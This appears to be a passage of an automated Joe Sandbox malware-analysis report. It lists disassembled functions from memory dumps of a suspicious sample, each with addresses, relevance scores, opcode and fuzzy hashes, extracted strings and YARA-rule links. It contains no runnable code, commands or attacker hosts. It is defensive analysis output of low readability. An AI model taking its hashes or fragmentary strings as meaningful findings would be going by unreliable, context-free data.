                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.1491055772.00007FF887B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_7ff887b50000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a59a83a9d3b4ac49aa414cb409dc0d86c0dfe0e4d3a4a467ae9acf96a72d91ff
                                                • Instruction ID: c65768fe1c29ade3328f4c5368d45a4449d2ada648a45cbd0931974a28e2faa2
                                                • Opcode Fuzzy Hash: a59a83a9d3b4ac49aa414cb409dc0d86c0dfe0e4d3a4a467ae9acf96a72d91ff
                                                • Instruction Fuzzy Hash: D361FA30D1464D8FEB94EBA8D899BECBBB1FF58340F10416AD00DE7292DB386985CB41
                                                Function 00007FF887B50A62 Relevance: .1, Instructions: 98COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.1491055772.00007FF887B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_7ff887b50000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a4a9db5dfb8f606a5f9128c1dbbca96bb5f1a484342f1ee1e66219a38841be96
                                                • Instruction ID: 973851b5304ede9bb9a5a1f1eb102787ba83a0226b66fc3a43fb925c04db9380
                                                • Opcode Fuzzy Hash: a4a9db5dfb8f606a5f9128c1dbbca96bb5f1a484342f1ee1e66219a38841be96
                                                • Instruction Fuzzy Hash: EE3152B2D5488E9BEB88EFA8E4656FDA7B2FF44740B440176D018D3697DE282801CB41
                                                Function 00007FF887B530C5 Relevance: .1, Instructions: 97COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.1491055772.00007FF887B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_7ff887b50000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ddcc63461a762c388060c642e209e1f04bd3ae45997d1b983f560858f76c1e8b
                                                • Instruction ID: 999d22acd80d1908e712095130e76fd1c2a67bbd6e99de8dbce3ce85e3a6fd80
                                                • Opcode Fuzzy Hash: ddcc63461a762c388060c642e209e1f04bd3ae45997d1b983f560858f76c1e8b
                                                • Instruction Fuzzy Hash: 8131F23188D6DD5FDB42EB649816AED7FB0FF0A310F0901B7E048D7292CA2C9951C7A1
                                                Function 00007FF887B558AA Relevance: .1, Instructions: 84COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.1491055772.00007FF887B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_7ff887b50000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 500668282fd4391d0bc0818ac1e8438ca992024206fb5a97d63c9adb4a8baf9c
                                                • Instruction ID: d7e3eeed8bfb9856e57b9d0049e31e86ef5f12888595a64a121f6038a037e216
                                                • Opcode Fuzzy Hash: 500668282fd4391d0bc0818ac1e8438ca992024206fb5a97d63c9adb4a8baf9c
                                                • Instruction Fuzzy Hash: E321D63094859D8FEB84EF68D4546ED77B2FF98350F000479E40EE7292DB386900CB41
                                                Function 00007FF887B50598 Relevance: .1, Instructions: 80COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.1491055772.00007FF887B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_7ff887b50000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ba70d9a01911965de6db3ef1b69fc508eb804a08c8043b07a07d63bc852189d1
                                                • Instruction ID: 4287b02012a029a34e08ce67abec4e502dfb32085051c0bb74d1fb24b11daaa0
                                                • Opcode Fuzzy Hash: ba70d9a01911965de6db3ef1b69fc508eb804a08c8043b07a07d63bc852189d1
                                                • Instruction Fuzzy Hash: F121D270D0965E8FDB58DFA8D8446EEB7B2FF48350F10053AE419E2291DB38A950CB90
                                                Function 00007FF887B52F6A Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.1491055772.00007FF887B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_7ff887b50000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dee98795f77e2344526dff4fcd3a19b278217a6eee782424243c9f4dbbefe8a4
                                                • Instruction ID: 9858cef6de2ef2e2a0714ec3618c37b881650f53ab1c1d993bdd9388b57b804c
                                                • Opcode Fuzzy Hash: dee98795f77e2344526dff4fcd3a19b278217a6eee782424243c9f4dbbefe8a4
                                                • Instruction Fuzzy Hash: B821B674A48A5D8FDF84EB98D495AECBBF2FF69340F511169D00DE7252CA34A841CB40
                                                Function 00007FF887B508B1 Relevance: .0, Instructions: 47COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.1491055772.00007FF887B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_7ff887b50000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 903cbe1b9009d9c6d37a2228d66175b8846e8ada7ac57ac9fd5ae77572598dc7
                                                • Instruction ID: 80e02874ba09488391c866f583c03dac199887c709befb64086960ca335844b6
                                                • Opcode Fuzzy Hash: 903cbe1b9009d9c6d37a2228d66175b8846e8ada7ac57ac9fd5ae77572598dc7
                                                • Instruction Fuzzy Hash: E10192318486C88FE744EF68D84D3993FA0FB9A314F8486AAD408C7296DB394498C782
                                                Function 00007FF887B50955 Relevance: .0, Instructions: 42COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.1491055772.00007FF887B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_7ff887b50000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f68f828fe86a7e92ffd59c621f63533278a9d2d1d12d03f18114c31a8ff5c22a
                                                • Instruction ID: 6c652c08253c3e2683c856fb61d283c964bdf6e2b702808c2598ba7658771b76
                                                • Opcode Fuzzy Hash: f68f828fe86a7e92ffd59c621f63533278a9d2d1d12d03f18114c31a8ff5c22a
                                                • Instruction Fuzzy Hash: 7EF0CD31C4858C9FEB44EBB8C8492ADBBB1FF04300F4101BAD419C7192EE386984C741
                                                Function 00007FF887B51BE3 Relevance: .0, Instructions: 37COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.1491055772.00007FF887B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_7ff887b50000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6691e1afb736adf9b95d1272be99e23ea373040f44d910f75ea98d48dc672a42
                                                • Instruction ID: a8128141a7aa695659897373cd16bdfbc37cd43b618ae8529c216b35e6ec012a
                                                • Opcode Fuzzy Hash: 6691e1afb736adf9b95d1272be99e23ea373040f44d910f75ea98d48dc672a42
                                                • Instruction Fuzzy Hash: B3F01731E0895C8FEF94EB9C98856ECB7B2FB68341F50016AC40EE3242DE385851DB40

                                                Non-executed Functions

                                                Function 00007FF887B50648 Relevance: 6.6, Strings: 5, Instructions: 376COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.1491055772.00007FF887B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_7ff887b50000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: "$"$-$[${
                                                • API String ID: 0-3019564589
                                                • Opcode ID: 46ffcaaec568281e3d5053674782477a296236d7af382252c3a80d591fa072b6
                                                • Instruction ID: 245005383d6f31201bd2e6692ab8f069bcfd9cd3bc99ee908a0f69512f90de9e
                                                • Opcode Fuzzy Hash: 46ffcaaec568281e3d5053674782477a296236d7af382252c3a80d591fa072b6
                                                • Instruction Fuzzy Hash: D0E1F570D186698FEBA8DF68D8947EDB7B2FF58341F5041BAD04DA7281CA386985CF40

                                                Executed Functions

                                                Function 00007FF887B250BA Relevance: 9.4, Strings: 7, Instructions: 607COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B25000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b25000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: "$"$-$[$]${$}
                                                • API String ID: 0-2220975799
                                                • Opcode ID: 0254c5a1f91b00e48266e37b1cb14391ff1072ae94170a220c5c1f51972c74be
                                                • Instruction ID: 7946aca1b8a26c9f7c6072e70e0699a7615529ed6cfa10eab10349154f912b12
                                                • Opcode Fuzzy Hash: 0254c5a1f91b00e48266e37b1cb14391ff1072ae94170a220c5c1f51972c74be
                                                • Instruction Fuzzy Hash: 5D42B370D196298FEBA8DF68C8947EDB7B2FF58341F5045B9D00EA6291DB385A81CF40
                                                Function 00007FF887B2109D Relevance: 1.5, Strings: 1, Instructions: 284COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b20000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0DL
                                                • API String ID: 0-3174716889
                                                • Opcode ID: 3ede8151b645162fc57d89eb6d24d20ae43f6b7a8b9066b19dd3153309e7e2cf
                                                • Instruction ID: 4dfe9500977bdedd8eb6797605b019a385d8055a585b5ad2cd3546b54639e38b
                                                • Opcode Fuzzy Hash: 3ede8151b645162fc57d89eb6d24d20ae43f6b7a8b9066b19dd3153309e7e2cf
                                                • Instruction Fuzzy Hash: 84918C71D5991D9FEB94EA28D8856EDB7B2FF59340F8001B9D00DE7282DE39A981CB40
                                                Function 00007FF887B27E08 Relevance: 13.6, Strings: 10, Instructions: 1136COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B25000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b25000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 6B$6B$6B$6B$6B$6B$6B$#S}$0DL$0DL
                                                • API String ID: 0-975879146
                                                • Opcode ID: 35bac1759eb51de9afaba29868aeab39cd66435847ba190ac8b8eaf060c268ec
                                                • Instruction ID: 459e6683d7e6617e57a1881b930618863b80dcffa7d9bc1591508edb5bc5fa26
                                                • Opcode Fuzzy Hash: 35bac1759eb51de9afaba29868aeab39cd66435847ba190ac8b8eaf060c268ec
                                                • Instruction Fuzzy Hash: 26A2B57095992D8FDBA8EB58C895BA9B7B2FF58340F5041E9D01DE7291CB35AE81CF00
                                                Function 00007FF887B2AD1D Relevance: 6.8, Strings: 5, Instructions: 589COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B25000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b25000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: b4B$r6B$r6B$r6B$r6B
                                                • API String ID: 0-225773078
                                                • Opcode ID: e8ebb6c0de7b9e0514211d53b2900e5a559f0b76784b1e389d86b8a82847dd18
                                                • Instruction ID: 89469db8ae2290d2fe84f7166839e29a9663243799fa1ad467bbd83c2ae720e8
                                                • Opcode Fuzzy Hash: e8ebb6c0de7b9e0514211d53b2900e5a559f0b76784b1e389d86b8a82847dd18
                                                • Instruction Fuzzy Hash: 5A12C031E696498FEB59DB68C4956BDB7B2FF48344F5045BAC41ED3282EE386842CB40
                                                Function 00007FF887B2A425 Relevance: 6.7, Strings: 5, Instructions: 459COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B25000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b25000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $r6B$r6B$r6B$r6B
                                                • API String ID: 0-1635170207
                                                • Opcode ID: 5ef51a61dc148d9895efd1ffab1099ebcfaaf15092bca534dd2e741112dbec29
                                                • Instruction ID: 9e9ae599a2b4485a842ef2afffbd49bd842767fa92bb40e814b81df5959eb0e3
                                                • Opcode Fuzzy Hash: 5ef51a61dc148d9895efd1ffab1099ebcfaaf15092bca534dd2e741112dbec29
                                                • Instruction Fuzzy Hash: 39F1D330E29A498FE759DB68D4906ADB7F2FF58300F9445BDC44EC7696CA38B842DB40
                                                Function 00007FF887B2D5E6 Relevance: 5.4, Strings: 4, Instructions: 425COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B25000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b25000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: /B$/B$/B$/B
                                                • API String ID: 0-2403987392
                                                • Opcode ID: e86e48c6fcc0cac19a9408a920ce245772348bffdfde66180e4b902a25b34fec
                                                • Instruction ID: bb55a3e521221d2159e14039a983314188086ca185863be8883664b8145f18f0
                                                • Opcode Fuzzy Hash: e86e48c6fcc0cac19a9408a920ce245772348bffdfde66180e4b902a25b34fec
                                                • Instruction Fuzzy Hash: 9C02F93091895D8FEB95EB68C899BE8B7B2FF58340F5041E9D40DD3292CE396981CF41
                                                Function 00007FF887B30185 Relevance: 4.1, Strings: 3, Instructions: 304COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B25000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b25000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6B$r6B$r6B
                                                • API String ID: 0-1049672097
                                                • Opcode ID: 41439028523e8f0daf757f509c005b322a022126d4be936a7b4ed5198c73bebd
                                                • Instruction ID: 6cda0bb3d516dbd1039d42462771be81d231f98fcea1fe923a43ac1661e0d980
                                                • Opcode Fuzzy Hash: 41439028523e8f0daf757f509c005b322a022126d4be936a7b4ed5198c73bebd
                                                • Instruction Fuzzy Hash: CEB1C330A58B868FE765DB69C4906AAB7F3FF58340F54457DC09AC3A96DA38F881C740
                                                Function 00007FF887B2C1FD Relevance: 4.0, Strings: 3, Instructions: 260COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B25000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b25000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 6B$L$L
                                                • API String ID: 0-3737499674
                                                • Opcode ID: b4cd9b3ff6065b913b67c37b429d7fcf3a48c539c542bccc7781ece2cda807b8
                                                • Instruction ID: 7e68dfe7c288f0c2e18617ad41d9e2682b87a5fd634787b5fce5fbdbecce0c0f
                                                • Opcode Fuzzy Hash: b4cd9b3ff6065b913b67c37b429d7fcf3a48c539c542bccc7781ece2cda807b8
                                                • Instruction Fuzzy Hash: 7891A470A08A5D8FDF98EF58D495BA977F1FF68301F5045AAD00DE7292CA35A985CB00
                                                Function 00007FF887B216C5 Relevance: 2.6, Strings: 2, Instructions: 127COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b20000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: P_H$HBL
                                                • API String ID: 0-296730277
                                                • Opcode ID: d363121f482fb28eabf1119ced40d38a697b556e98b20460fdd3882e9d5134c5
                                                • Instruction ID: 05ea13a485f6bdf9697cf8bc97c4b5244261d7153f9b7ed3f2b8473a2f084733
                                                • Opcode Fuzzy Hash: d363121f482fb28eabf1119ced40d38a697b556e98b20460fdd3882e9d5134c5
                                                • Instruction Fuzzy Hash: 6E41ED71C2864D8FEB45EBA8D8156FDBBB2FF48340F0401B6D009E7192DE38A900CB91
                                                Function 00007FF887B2CAFE Relevance: 2.6, Strings: 2, Instructions: 101COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B25000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b25000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (3K$r6B
                                                • API String ID: 0-2051520653
                                                • Opcode ID: cbe36f5722613979b6b57273002607972dc2e8cdf1aaf44d9b1185372a3289f0
                                                • Instruction ID: 7b744afe0cc84ebe40fe2a2ed88ebd2d537b103c03061fc0ad7595a490cc79e9
                                                • Opcode Fuzzy Hash: cbe36f5722613979b6b57273002607972dc2e8cdf1aaf44d9b1185372a3289f0
                                                • Instruction Fuzzy Hash: 4A31D731E5894E8FDF84EBACD499AAD7BF1FF58340F400576D009D7266DA78A841CB40
                                                Function 00007FF887B292F8 Relevance: 2.6, Strings: 2, Instructions: 100COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B25000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b25000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6B$r6B
                                                • API String ID: 0-2860294223
                                                • Opcode ID: 980eda2399fc662659d104f933b9967ab01fbb902ec61094a33e81ec83bbc8c6
                                                • Instruction ID: 5fe1ee043252013845c2d48983711a18533e46a5963061fa6147ea7c33eeffc9
                                                • Opcode Fuzzy Hash: 980eda2399fc662659d104f933b9967ab01fbb902ec61094a33e81ec83bbc8c6
                                                • Instruction Fuzzy Hash: DD31A432E6D9498FE758E66898553FCB6E2FF59351F84027AD05EC31C7EE1868058381
                                                Function 00007FF887B205F8 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b20000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: P_H$HBL
                                                • API String ID: 0-296730277
                                                • Opcode ID: 78992dc1655346a4f0e43706eb3c12163f98de8e5582b2c35a00e9d32610d77c
                                                • Instruction ID: 54cc52a208ccbdbafbde9c0997e00ad388b45f039dbe63e761ebd2e4f28da692
                                                • Opcode Fuzzy Hash: 78992dc1655346a4f0e43706eb3c12163f98de8e5582b2c35a00e9d32610d77c
                                                • Instruction Fuzzy Hash: 3E318AB1C2864D9FEB45EBA4D8157EDB7B2FF58340F4002BAD009E7196DE386940CB41
                                                Function 00007FF887B2D065 Relevance: 2.6, Strings: 2, Instructions: 90COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B25000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b25000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6B$r6B
                                                • API String ID: 0-2860294223
                                                • Opcode ID: 27416f871955acb49c22c7424450dbeefac68da87293c5c5363535bc98539bca
                                                • Instruction ID: d8d0cfc62078d7aebe0e2392fe399ae262a8168828540e5b5901c5b52bc0a03f
                                                • Opcode Fuzzy Hash: 27416f871955acb49c22c7424450dbeefac68da87293c5c5363535bc98539bca
                                                • Instruction Fuzzy Hash: 26215031F6D9195BA658E65CE8566FD73F3FFD8B60B940139D00DD3286DD246C028681
                                                Function 00007FF887B3058C Relevance: 2.6, Strings: 2, Instructions: 80COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B25000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b25000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $r6B
                                                • API String ID: 0-2315467569
                                                • Opcode ID: 683678acddbac562f8519b9a7725312b0e8f740fe6eeecf5686c381b3651f1b0
                                                • Instruction ID: e8c44d29a7d0f44a2265a43564c5521ebeb830a935d47f75d6ff7bea8b62bcba
                                                • Opcode Fuzzy Hash: 683678acddbac562f8519b9a7725312b0e8f740fe6eeecf5686c381b3651f1b0
                                                • Instruction Fuzzy Hash: AF218E31E5850A9FDB48DB98E8506EDB7B2FF98310F5041BAD01DE7286CE386942CB40
                                                Function 00007FF887B2A796 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B25000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b25000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $r6B
                                                • API String ID: 0-2315467569
                                                • Opcode ID: 3a35c5da5a0dfba67f98eda782ccf4456afeb7d2f0ddfc7f5693e18f5c96c24e
                                                • Instruction ID: 23a1c628c6a3498a66ed479ee063dbb6ec5d8e1b64f11b6ccad9f52058dd5df5
                                                • Opcode Fuzzy Hash: 3a35c5da5a0dfba67f98eda782ccf4456afeb7d2f0ddfc7f5693e18f5c96c24e
                                                • Instruction Fuzzy Hash: 84214A32DA954A9EFB58DA98D4586FCB7B2FF88341F80417AC40DD619ACE3C2942DB41
                                                Function 00007FF887B25F5D Relevance: 2.5, Strings: 2, Instructions: 2COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B25000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b25000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: O_I$O_I
                                                • API String ID: 0-150625707
                                                • Opcode ID: 9b327634b3a5c9b9df33ddb26911ec8584d6efcca3358c6d10e96d9fa50011dd
                                                • Instruction ID: 6e7ab5de08090d80917d80c7e7aac02eef25f4f4bb4dea6f21fd88126392ef08
                                                • Opcode Fuzzy Hash: 9b327634b3a5c9b9df33ddb26911ec8584d6efcca3358c6d10e96d9fa50011dd
                                                • Instruction Fuzzy Hash:
                                                Function 00007FF887B30AF6 Relevance: 1.5, Strings: 1, Instructions: 260COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B25000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b25000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6B
                                                • API String ID: 0-2624010786
                                                • Opcode ID: 4e48ddb39af6d68d02441bd9ac5ab947be0635d64b07e6d159da913411028b80
                                                • Instruction ID: 4fc41cb838dce3e755e9cd6f98482dcb0bc2905187d0aac0f8e215abde6eb4ed
                                                • Opcode Fuzzy Hash: 4e48ddb39af6d68d02441bd9ac5ab947be0635d64b07e6d159da913411028b80
                                                • Instruction Fuzzy Hash: BDB13A34D4861E9FDB49CFA8C494AADB7F2FF58340F1044A9D42ED7396CA39A981CB05
                                                Function 00007FF887B308BA Relevance: 1.5, Strings: 1, Instructions: 213COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B25000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b25000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: b4B
                                                • API String ID: 0-3849415641
                                                • Opcode ID: 760c73782f7dae22bf00b7f65ca4a701383215bbabb0ece4af657aa0a0d67374
                                                • Instruction ID: 722e9afa4d14d2d5a6654d318be4bd76a512bb0b0709d4a5a7caa7e3546aaf10
                                                • Opcode Fuzzy Hash: 760c73782f7dae22bf00b7f65ca4a701383215bbabb0ece4af657aa0a0d67374
                                                • Instruction Fuzzy Hash: DC512831A9C69A4FF70D9AAC98512BC77E2FF45358F1406BEC4ABD7183D9186883C781
                                                Function 00007FF887B2AB5A Relevance: 1.5, Strings: 1, Instructions: 213COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B25000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b25000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: b4B
                                                • API String ID: 0-3849415641
                                                • Opcode ID: 078013f7a0efb43d86431ccac1c351dbd08cdb79dfb71ccb8bc5228f7f182416
                                                • Instruction ID: 50fff72c8c0d5367a34d90567bf2012cf1e1f89b7b5fd734fcc561521a9ec346
                                                • Opcode Fuzzy Hash: 078013f7a0efb43d86431ccac1c351dbd08cdb79dfb71ccb8bc5228f7f182416
                                                • Instruction Fuzzy Hash: DA514931A6D6990FF70D9B6898512BC77E2FB46358F6401BEC88BC72D3D919A843C381
                                                Function 00007FF887B20C36 Relevance: 1.4, Strings: 1, Instructions: 195COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b20000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0DL
